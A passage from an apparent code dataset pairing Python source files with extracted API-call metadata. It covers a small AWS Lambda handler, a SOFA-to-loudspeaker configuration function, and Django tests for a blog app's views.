] | [((207, 234), 'firebase_admin.auth.verify_id_token', 'auth.verify_id_token', (['token'], {}), '(token)\n', (227, 234), False, 'from firebase_admin import auth\n'), ((332, 431), 'requests.get', 'requests.get', (['"""http://tags:7000/api/users/tags"""'], {'headers': "{'authorization': token}", 'verify': '(False)'}), "('http://tags:7000/api/users/tags', headers={'authorization':\n token}, verify=False)\n", (344, 431), False, 'import requests\n'), ((501, 527), 'ast.literal_eval', 'ast.literal_eval', (['dict_tag'], {}), '(dict_tag)\n', (517, 527), False, 'import ast\n'), ((619, 720), 'requests.get', 'requests.get', (['"""http://tasks:1000/api/users/tasks"""'], {'headers': "{'authorization': token}", 'verify': '(False)'}), "('http://tasks:1000/api/users/tasks', headers={'authorization':\n token}, verify=False)\n", (631, 720), False, 'import requests\n'), ((803, 831), 'ast.literal_eval', 'ast.literal_eval', (['dict_tasks'], {}), '(dict_tasks)\n', (819, 831), False, 'import ast\n')] |
#!/usr/bin/env python3.8
# coding=utf-8
"""
Simple Lambda Handler
"""
from lbz.dev.server import MyDevServer
from lbz.dev.test import Client
from lbz.exceptions import LambdaFWException
from lbz.resource import Resource
from lbz.response import Response
from lbz.router import add_route
class HelloWorld(Resource):
    """Minimal lbz Resource exposing a single GET endpoint at the root path."""

    @add_route("/", method="GET")
    def list(self):
        """Return a static JSON greeting payload."""
        return Response({"message": "HelloWorld"})
def handle(event, context):
    """AWS Lambda entry point.

    Dispatches *event* through the HelloWorld resource; any unhandled
    error is converted into the framework's standard error response
    (tagged with the request id) instead of leaking a traceback.
    """
    try:
        return HelloWorld(event)()
    except Exception:  # pylint: disable=broad-except
        error_response = LambdaFWException().get_response(context.aws_request_id)
        return error_response.to_dict()
class TestHelloWorld:
    """Tests for the HelloWorld resource using the lbz test client."""

    def setup_method(self) -> None:
        # pylint: disable=attribute-defined-outside-init
        # Fresh client per test so state cannot leak between tests.
        self.client = Client(resource=HelloWorld)
    def test_filter_queries_all_active_when_no_params(self) -> None:
        """GET / returns the serialized greeting in the response body."""
        data = self.client.get("/").to_dict()["body"]
        assert data == '{"message":"HelloWorld"}'
if __name__ == "__main__":
    # Launch a local development server for manual testing.
    MyDevServer(acls=HelloWorld, port=8001).run()
| [
"lbz.exceptions.LambdaFWException",
"lbz.router.add_route",
"lbz.response.Response",
"lbz.dev.test.Client",
"lbz.dev.server.MyDevServer"
] | [((322, 350), 'lbz.router.add_route', 'add_route', (['"""/"""'], {'method': '"""GET"""'}), "('/', method='GET')\n", (331, 350), False, 'from lbz.router import add_route\n'), ((1053, 1092), 'lbz.dev.server.MyDevServer', 'MyDevServer', ([], {'acls': 'HelloWorld', 'port': '(8001)'}), '(acls=HelloWorld, port=8001)\n', (1064, 1092), False, 'from lbz.dev.server import MyDevServer\n'), ((386, 421), 'lbz.response.Response', 'Response', (["{'message': 'HelloWorld'}"], {}), "({'message': 'HelloWorld'})\n", (394, 421), False, 'from lbz.response import Response\n'), ((809, 836), 'lbz.dev.test.Client', 'Client', ([], {'resource': 'HelloWorld'}), '(resource=HelloWorld)\n', (815, 836), False, 'from lbz.dev.test import Client\n'), ((603, 622), 'lbz.exceptions.LambdaFWException', 'LambdaFWException', ([], {}), '()\n', (620, 622), False, 'from lbz.exceptions import LambdaFWException\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu May 3 08:04:22 2018
@author: af5u13
"""
import numpy as np
import os
from .geometry_functions import deg2rad, sph2cart
from loudspeakerconfig import createArrayConfigFile
def createArrayConfigFromSofa( sofaFile, xmlFile = None, lspLabels = None, twoDSetup = False, virtualLoudspeakers = [] ):
    """
    Create a loudspeaker configuration file from a SOFA file containing a number of emitters representing loudspeakers.

    Parameters
    ==========
    sofaFile: string
        A file path to a SOFA file.
    xmlFile: string, optional
        Path of the XML output file to be written.
        Optional argument, if not provided, the SOFA file path is used with the extension replaced by ".xml"
    lspLabels: list of strings, optional
        List of loudspeaker labels, must match the number of emitters in the SOFA files.
        If not provided, numbered labels are automatically generated.
    twoDSetup: bool, optional
        Flag specifying whether the array is to be considered plane (True) or 3D (False).
        Optional value, default is False (3D).
    virtualLoudspeakers: list, optional
        A list of virtual loudspeakers to be added to the setup. Each entry must be a Python dict as described
        in the function :py:meth:`loudspeakerconfig.createArrayConfigFile`.
        (The mutable default is safe here: the list is only read, never mutated.)
    """
    import h5py # Import in the function to avoid a global dependency.
    if not os.path.exists( sofaFile ):
        raise ValueError( "SOFA file does not exist.")
    if xmlFile is None:
        # Replace the extension as documented. Previously ".xml" was merely
        # appended to the basename, producing "foo.sofa.xml" in the CWD
        # instead of "foo.xml" next to the input file.
        xmlFile = os.path.splitext( sofaFile )[0] + '.xml'
    # Open read-only; the context manager guarantees the HDF5 handle is
    # closed even if parsing raises (the old code leaked it on error).
    with h5py.File( sofaFile, 'r' ) as fh:
        ep = fh.get('EmitterPosition')
        emitterCoordSystem = ep.attrs['Type'] # This is a required attribute.
        # Depending on the h5py/file version the attribute arrives as bytes or str.
        if isinstance( emitterCoordSystem, bytes ):
            emitterCoordSystem = emitterCoordSystem.decode("utf-8")
        if emitterCoordSystem == "spherical":
            posSph = np.squeeze( np.asarray(ep) )
            posSph[:,0] = deg2rad( posSph[:,0] )
            posSph[:,1] = deg2rad( posSph[:,1] )
            posCart = sph2cart( posSph[:,0], posSph[:,1], posSph[:,2] )
        else:
            posCart = np.squeeze( np.asarray(ep) )
    if twoDSetup:
        posCart = posCart[:,0:2] # Drop the z coordinate for planar setups.
    createArrayConfigFile( xmlFile,
                           posCart.T,
                           loudspeakerLabels = lspLabels,
                           twoDconfig = twoDSetup,
                           sphericalPositions = True,
                           virtualLoudspeakers = virtualLoudspeakers )
| [
"os.path.exists",
"numpy.asarray",
"h5py.File",
"loudspeakerconfig.createArrayConfigFile",
"os.path.basename"
] | [((1586, 1605), 'h5py.File', 'h5py.File', (['sofaFile'], {}), '(sofaFile)\n', (1595, 1605), False, 'import h5py\n'), ((2157, 2324), 'loudspeakerconfig.createArrayConfigFile', 'createArrayConfigFile', (['xmlFile', 'posCart.T'], {'loudspeakerLabels': 'lspLabels', 'twoDconfig': 'twoDSetup', 'sphericalPositions': '(True)', 'virtualLoudspeakers': 'virtualLoudspeakers'}), '(xmlFile, posCart.T, loudspeakerLabels=lspLabels,\n twoDconfig=twoDSetup, sphericalPositions=True, virtualLoudspeakers=\n virtualLoudspeakers)\n', (2178, 2324), False, 'from loudspeakerconfig import createArrayConfigFile\n'), ((1414, 1438), 'os.path.exists', 'os.path.exists', (['sofaFile'], {}), '(sofaFile)\n', (1428, 1438), False, 'import os\n'), ((1540, 1566), 'os.path.basename', 'os.path.basename', (['sofaFile'], {}), '(sofaFile)\n', (1556, 1566), False, 'import os\n'), ((1869, 1883), 'numpy.asarray', 'np.asarray', (['ep'], {}), '(ep)\n', (1879, 1883), True, 'import numpy as np\n'), ((2084, 2098), 'numpy.asarray', 'np.asarray', (['ep'], {}), '(ep)\n', (2094, 2098), True, 'import numpy as np\n')] |
# from unittest import skip
from django.conf import settings
from django.contrib import auth
from django.urls import reverse
from django.test import TestCase
from plok.models import Blog, Article
from .ext_test_case import ExtTestCase
class BlogList(TestCase):
    """Tests for the blog list view (URL name ``plok:blog_list``)."""
    url_name = 'plok:blog_list'
    def test_reverse_blog_list(self):
        """The list view is routed at /list/."""
        self.assertEqual(reverse(self.url_name), '/list/')
    def test_uses_correct_template(self):
        """The list view renders the blog_list template."""
        response = self.client.get(reverse(self.url_name))
        self.assertTemplateUsed(response, 'plok/blog_list.html')
    def test_default_context(self):
        """Both created blogs appear in the context; adding is disabled."""
        creator = auth.get_user_model().objects.create(username='creator')
        blog1 = Blog.objects.create(created_by=creator, name="test_blog_1", title="Test blog 1")
        blog2 = Blog.objects.create(created_by=creator, name="test_blog_2", title="Test blog 2")
        response = self.client.get(reverse(self.url_name))
        self.assertEqual(response.context['page'], 'blogs')
        self.assertEqual(response.context['title'], 'Blogs')
        self.assertEqual(response.context['blog_list'].count(), 2)
        self.assertEqual(response.context['blog_list'][0], blog1)
        self.assertEqual(response.context['blog_list'][1], blog2)
        self.assertEqual(response.context['message'], '')
        # NOTE(review): expectation flipped at some point -- 'can_add' is
        # now asserted False even for anonymous visitors; confirm intended.
        # self.assertEqual(response.context['can_add'], True)
        self.assertEqual(response.context['can_add'], False)
class BlogPage(ExtTestCase):
    """Tests for the blog detail view (URL name ``plok:blog``)."""
    url_name = 'plok:blog'
    def test_reverse_blog(self):
        """The detail view is routed at /plok/<name>/."""
        self.assertEqual(reverse(self.url_name, args=['test_blog']), '/plok/test_blog/')
    def test_uses_correct_template(self):
        """The detail view renders the blog_detail template."""
        creator = auth.get_user_model().objects.create(username='creator')
        blog = Blog.objects.create(created_by=creator, name="test_blog")
        response = self.client.get(reverse(self.url_name, args=[blog.name]))
        self.assertTemplateUsed(response, 'plok/blog_detail.html')
    def test_get_absolute_url(self):
        """Blog.get_absolute_url matches the reversed detail URL."""
        creator = auth.get_user_model().objects.create(username='creator')
        blog = Blog.objects.create(created_by=creator, name="test_blog")
        self.assertEqual(blog.get_absolute_url(), reverse(self.url_name, args=[blog.name]))
    def test_default_context(self):
        """Fresh blog: no articles, title from blog, editing disabled."""
        creator = auth.get_user_model().objects.create(username='creator')
        blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
        response = self.client.get(reverse(self.url_name, args=[blog.name]))
        self.assertEqual(response.context['blog'], blog)
        self.assertEqual(response.context['blog'].articles().count(), 0)
        self.assertEqual(response.context['title'], 'Test blog')
        self.assertEqual(response.context['message'], '')
        self.assertEqual(response.context['can_edit'], False)
    def test_404_no_blog(self):
        """Requesting a nonexistent blog renders the 404 page."""
        response = self.client.get(reverse(self.url_name, args=['test_blog']))
        self.assertTemplateUsed(response, '404.html')
    def test_cant_edit_if_not_logged_in(self):
        """Anonymous visitors get can_edit=False."""
        creator = auth.get_user_model().objects.create(username='creator')
        blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
        response = self.client.get(reverse(self.url_name, args=[blog.name]))
        self.assertEqual(response.context['can_edit'], False)
    def test_cant_edit_if_not_creator(self):
        """Logged-in non-creator users get can_edit=False."""
        creator = auth.get_user_model().objects.create(username='creator')
        blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
        self.create_and_log_in_user()
        response = self.client.get(reverse(self.url_name, args=[blog.name]))
        self.assertEqual(response.context['can_edit'], False)
    def test_shows_articles(self):
        """Articles attached to the blog are listed in its context."""
        creator = auth.get_user_model().objects.create(username='creator')
        blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
        article = Article.objects.create(blog=blog, name="test_article", title="Test article", created_by=creator)
        response = self.client.get(reverse(self.url_name, args=[blog.name]))
        self.assertEqual(response.context['blog'].articles().count(), 1)
        self.assertEqual(response.context['blog'].articles()[0], article)
class CreateBlogPage(ExtTestCase):
    """Tests for the blog creation view (URL name ``plok:blog_create``)."""
    url_name = 'plok:blog_create'
    def test_reverse_blog_create(self):
        """The create view is routed at /create/."""
        self.assertEqual(reverse(self.url_name), '/create/')
    def test_uses_correct_template(self):
        """Logged-in users see the blog form."""
        self.create_and_log_in_user()
        response = self.client.get(reverse(self.url_name))
        self.assertTemplateUsed(response, 'plok/blog_form.html')
    def test_default_context(self):
        """The form page has the expected title and an empty message."""
        self.create_and_log_in_user()
        # Pin the language cookie so the asserted strings are the English ones.
        self.client.cookies.load({settings.LANGUAGE_COOKIE_NAME: 'en-us'})
        response = self.client.get(reverse(self.url_name))
        self.assertEqual(response.context['title'], 'Create new blog')
        self.assertEqual(response.context['message'], '')
    def test_can_create_new_blog(self):
        """POSTing valid data creates a blog with the submitted fields."""
        self.assertEqual(Blog.objects.all().count(), 0)
        self.create_and_log_in_user()
        response = self.client.post(reverse(self.url_name), {
            'name': 'test_blog',
            'title': 'Test blog',
            'description': 'For testing'},
            follow=True)
        self.assertEqual(Blog.objects.all().count(), 1)
        self.assertEqual(response.context['blog'].name, 'test_blog')
        self.assertEqual(response.context['blog'].title, 'Test blog')
        self.assertEqual(response.context['blog'].description, 'For testing')
    def test_cant_create_blog_if_not_logged_in(self):
        """Anonymous visitors are redirected to the login page."""
        response = self.client.get(reverse(self.url_name), follow=True)
        self.assertTemplateUsed(response, 'account/login.html')
    def test_cant_create_blog_with_existing_name(self):
        """Duplicate blog names are rejected and re-render the form."""
        user = self.create_and_log_in_user()
        Blog.objects.create(created_by=user, name="test_blog", title="Test blog")
        self.assertEqual(Blog.objects.all().count(), 1)
        # Pin the language cookie so the asserted error string is English.
        self.client.cookies.load({settings.LANGUAGE_COOKIE_NAME: 'en-us'})
        response = self.client.post(
            reverse(self.url_name),
            {
                'name': 'test_blog',
                'title': 'Test blog',
                'description': 'For testing'
            },
            follow=True)
        self.assertEqual(Blog.objects.all().count(), 1)
        self.assertTemplateUsed(response, 'plok/blog_form.html')
        self.assertContains(response, 'Blog with this Name already exists')
class UpdateBlogPage(ExtTestCase):
    """Tests for the blog update view (URL name ``plok:blog_update``)."""
    url_name = 'plok:blog_update'
    def test_reverse_blog_update(self):
        """The update view is routed at /plok/<name>/update/."""
        self.assertEqual(reverse(self.url_name, args=['test_blog']), '/plok/test_blog/update/')
    def test_uses_correct_template(self):
        """The creator sees the blog form when updating."""
        user = self.create_and_log_in_user()
        blog = Blog.objects.create(created_by=user, name="test_blog")
        response = self.client.get(reverse(self.url_name, args=[blog.name]))
        self.assertTemplateUsed(response, 'plok/blog_form.html')
    def test_404_no_blog(self):
        """Updating a nonexistent blog renders the 404 page."""
        self.create_and_log_in_user()
        response = self.client.get(reverse(self.url_name, args=['test_blog']))
        self.assertTemplateUsed(response, '404.html')
    def test_can_update_blog(self):
        """The creator can change title and description via POST."""
        user = self.create_and_log_in_user()
        Blog.objects.create(created_by=user, name="test_blog", title="Test blog", description="Testing")
        self.assertEqual(Blog.objects.all().count(), 1)
        response = self.client.post(reverse(self.url_name, args=['test_blog']), {
            'title': 'Test blog updated',
            'description': 'Updated'},
            follow=True)
        self.assertEqual(Blog.objects.all().count(), 1)
        blog = Blog.objects.all()[0]
        self.assertEqual(blog.title, 'Test blog updated')
        self.assertEqual(blog.description, 'Updated')
        self.assertTemplateUsed(response, 'plok/blog_detail.html')
        self.assertEqual(response.context['blog'].title, 'Test blog updated')
        self.assertEqual(response.context['blog'].description, 'Updated')
    def test_cant_update_blog_if_not_logged_in(self):
        """Anonymous POSTs change nothing and land on the login page."""
        creator = auth.get_user_model().objects.create(username='creator')
        Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
        response = self.client.post(reverse(self.url_name, args=['test_blog']), {
            'title': 'Test blog updated',
            'description': 'Updated'},
            follow=True)
        blog = Blog.objects.all()[0]
        self.assertEqual(blog.title, 'Test blog')
        self.assertEqual(blog.description, 'Testing')
        self.assertTemplateUsed(response, 'account/login.html')
        # Kept for reference: template path before the allauth migration.
        # self.assertTemplateUsed(response, 'registration/login.html')
    def test_cant_update_blog_if_not_creator(self):
        """A non-creator's POST falls through to the detail page."""
        creator = auth.get_user_model().objects.create(username='creator')
        Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
        self.create_and_log_in_user()
        response = self.client.post(reverse(self.url_name, args=['test_blog']), {
            'title': 'Test blog updated',
            'description': 'Updated'},
            follow=True)
        self.assertTemplateUsed(response, 'plok/blog_detail.html')
class DeleteBlogPage(ExtTestCase):
    """Tests for the blog delete view (URL name ``plok:blog_delete``)."""
    url_name = 'plok:blog_delete'
    def test_reverse_blog_delete(self):
        """The delete view is routed at /plok/<name>/delete/."""
        self.assertEqual(reverse(self.url_name, args=['test_blog']), '/plok/test_blog/delete/')
    def test_uses_correct_template(self):
        """The creator sees the delete confirmation page."""
        user = self.create_and_log_in_user()
        blog = Blog.objects.create(created_by=user, name="test_blog")
        response = self.client.get(reverse(self.url_name, args=[blog.name]))
        self.assertTemplateUsed(response, 'plok/blog_confirm_delete.html')
    def test_404_no_blog(self):
        """Deleting a nonexistent blog renders the 404 page."""
        user = self.create_and_log_in_user()
        response = self.client.get(reverse(self.url_name, args=['test_blog']))
        self.assertTemplateUsed(response, '404.html')
    def test_can_delete_blog(self):
        """The creator's POST removes the blog from the database."""
        user = self.create_and_log_in_user()
        Blog.objects.create(created_by=user, name="test_blog", title="Test blog", description="Testing")
        self.assertEqual(Blog.objects.all().count(), 1)
        response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
        self.assertEqual(Blog.objects.all().count(), 0)
    def test_cant_delete_blog_if_not_logged_in(self):
        """Anonymous POSTs are redirected to the login page."""
        creator = auth.get_user_model().objects.create(username='creator')
        Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
        response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
        # Kept for reference: template path before the allauth migration.
        # self.assertTemplateUsed(response, 'registration/login.html')
        self.assertTemplateUsed(response, 'account/login.html')
    def test_cant_delete_blog_if_not_creator(self):
        """Non-creators get a 404 and the blog survives."""
        creator = auth.get_user_model().objects.create(username='creator')
        Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
        user = self.create_and_log_in_user()
        self.assertEqual(Blog.objects.all().count(), 1)
        response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
        self.assertEqual(Blog.objects.all().count(), 1)
        self.assertTemplateUsed(response, '404.html')
    def test_cant_delete_blog_if_blog_has_articles(self):
        """A blog with articles cannot be deleted (404, nothing removed)."""
        user = self.create_and_log_in_user()
        blog = Blog.objects.create(created_by=user, name="test_blog", title="Test blog", description="Testing")
        article = Article.objects.create(created_by=user, blog=blog, name="test_article", title="Test article")
        self.assertEqual(Blog.objects.all().count(), 1)
        self.assertEqual(Article.objects.all().count(), 1)
        response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
        self.assertEqual(Blog.objects.all().count(), 1)
        self.assertEqual(Article.objects.all().count(), 1)
        self.assertTemplateUsed(response, '404.html')
| [
"plok.models.Blog.objects.create",
"django.contrib.auth.get_user_model",
"plok.models.Article.objects.create",
"plok.models.Article.objects.all",
"plok.models.Blog.objects.all",
"django.urls.reverse"
] | [((688, 773), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog_1"""', 'title': '"""Test blog 1"""'}), "(created_by=creator, name='test_blog_1', title='Test blog 1'\n )\n", (707, 773), False, 'from plok.models import Blog, Article\n'), ((785, 870), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog_2"""', 'title': '"""Test blog 2"""'}), "(created_by=creator, name='test_blog_2', title='Test blog 2'\n )\n", (804, 870), False, 'from plok.models import Blog, Article\n'), ((1740, 1797), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""'}), "(created_by=creator, name='test_blog')\n", (1759, 1797), False, 'from plok.models import Blog, Article\n'), ((2070, 2127), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""'}), "(created_by=creator, name='test_blog')\n", (2089, 2127), False, 'from plok.models import Blog, Article\n'), ((2347, 2423), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (2366, 2423), False, 'from plok.models import Blog, Article\n'), ((3120, 3196), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (3139, 3196), False, 'from plok.models import Blog, Article\n'), ((3472, 3548), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (3491, 3548), False, 'from plok.models import Blog, Article\n'), ((3852, 3928), 'plok.models.Blog.objects.create', 
'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (3871, 3928), False, 'from plok.models import Blog, Article\n'), ((3947, 4047), 'plok.models.Article.objects.create', 'Article.objects.create', ([], {'blog': 'blog', 'name': '"""test_article"""', 'title': '"""Test article"""', 'created_by': 'creator'}), "(blog=blog, name='test_article', title='Test article',\n created_by=creator)\n", (3969, 4047), False, 'from plok.models import Blog, Article\n'), ((5914, 5987), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=user, name='test_blog', title='Test blog')\n", (5933, 5987), False, 'from plok.models import Blog, Article\n'), ((6874, 6928), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""'}), "(created_by=user, name='test_blog')\n", (6893, 6928), False, 'from plok.models import Blog, Article\n'), ((7365, 7465), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=user, name='test_blog', title='Test blog',\n description='Testing')\n", (7384, 7465), False, 'from plok.models import Blog, Article\n'), ((8292, 8395), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, name='test_blog', title='Test blog',\n description='Testing')\n", (8311, 8395), False, 'from plok.models import Blog, Article\n'), ((9064, 9167), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, 
name='test_blog', title='Test blog',\n description='Testing')\n", (9083, 9167), False, 'from plok.models import Blog, Article\n'), ((9840, 9894), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""'}), "(created_by=user, name='test_blog')\n", (9859, 9894), False, 'from plok.models import Blog, Article\n'), ((10348, 10448), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=user, name='test_blog', title='Test blog',\n description='Testing')\n", (10367, 10448), False, 'from plok.models import Blog, Article\n'), ((10792, 10895), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, name='test_blog', title='Test blog',\n description='Testing')\n", (10811, 10895), False, 'from plok.models import Blog, Article\n'), ((11260, 11363), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, name='test_blog', title='Test blog',\n description='Testing')\n", (11279, 11363), False, 'from plok.models import Blog, Article\n'), ((11787, 11887), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=user, name='test_blog', title='Test blog',\n description='Testing')\n", (11806, 11887), False, 'from plok.models import Blog, Article\n'), ((11902, 11999), 'plok.models.Article.objects.create', 'Article.objects.create', ([], {'created_by': 'user', 'blog': 'blog', 'name': '"""test_article"""', 'title': '"""Test article"""'}), "(created_by=user, blog=blog, name='test_article',\n 
title='Test article')\n", (11924, 11999), False, 'from plok.models import Blog, Article\n'), ((359, 381), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (366, 381), False, 'from django.urls import reverse\n'), ((471, 493), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (478, 493), False, 'from django.urls import reverse\n'), ((901, 923), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (908, 923), False, 'from django.urls import reverse\n'), ((1543, 1585), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (1550, 1585), False, 'from django.urls import reverse\n'), ((1833, 1873), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (1840, 1873), False, 'from django.urls import reverse\n'), ((2178, 2218), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (2185, 2218), False, 'from django.urls import reverse\n'), ((2459, 2499), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (2466, 2499), False, 'from django.urls import reverse\n'), ((2884, 2926), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (2891, 2926), False, 'from django.urls import reverse\n'), ((3232, 3272), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (3239, 3272), False, 'from django.urls import reverse\n'), ((3622, 3662), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (3629, 3662), False, 'from django.urls import reverse\n'), ((4079, 4119), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), 
'(self.url_name, args=[blog.name])\n', (4086, 4119), False, 'from django.urls import reverse\n'), ((4405, 4427), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (4412, 4427), False, 'from django.urls import reverse\n'), ((4557, 4579), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (4564, 4579), False, 'from django.urls import reverse\n'), ((4831, 4853), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (4838, 4853), False, 'from django.urls import reverse\n'), ((5155, 5177), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (5162, 5177), False, 'from django.urls import reverse\n'), ((5703, 5725), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (5710, 5725), False, 'from django.urls import reverse\n'), ((6168, 6190), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (6175, 6190), False, 'from django.urls import reverse\n'), ((6700, 6742), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (6707, 6742), False, 'from django.urls import reverse\n'), ((6964, 7004), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (6971, 7004), False, 'from django.urls import reverse\n'), ((7177, 7219), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (7184, 7219), False, 'from django.urls import reverse\n'), ((7554, 7596), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (7561, 7596), False, 'from django.urls import reverse\n'), ((7801, 7819), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (7817, 7819), False, 'from plok.models import Blog, Article\n'), ((8428, 8470), 'django.urls.reverse', 
'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (8435, 8470), False, 'from django.urls import reverse\n'), ((8667, 8685), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (8683, 8685), False, 'from plok.models import Blog, Article\n'), ((9238, 9280), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (9245, 9280), False, 'from django.urls import reverse\n'), ((9666, 9708), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (9673, 9708), False, 'from django.urls import reverse\n'), ((9930, 9970), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (9937, 9970), False, 'from django.urls import reverse\n'), ((10160, 10202), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (10167, 10202), False, 'from django.urls import reverse\n'), ((10537, 10579), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (10544, 10579), False, 'from django.urls import reverse\n'), ((10928, 10970), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (10935, 10970), False, 'from django.urls import reverse\n'), ((11497, 11539), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (11504, 11539), False, 'from django.urls import reverse\n'), ((12147, 12189), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (12154, 12189), False, 'from django.urls import reverse\n'), ((615, 636), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (634, 
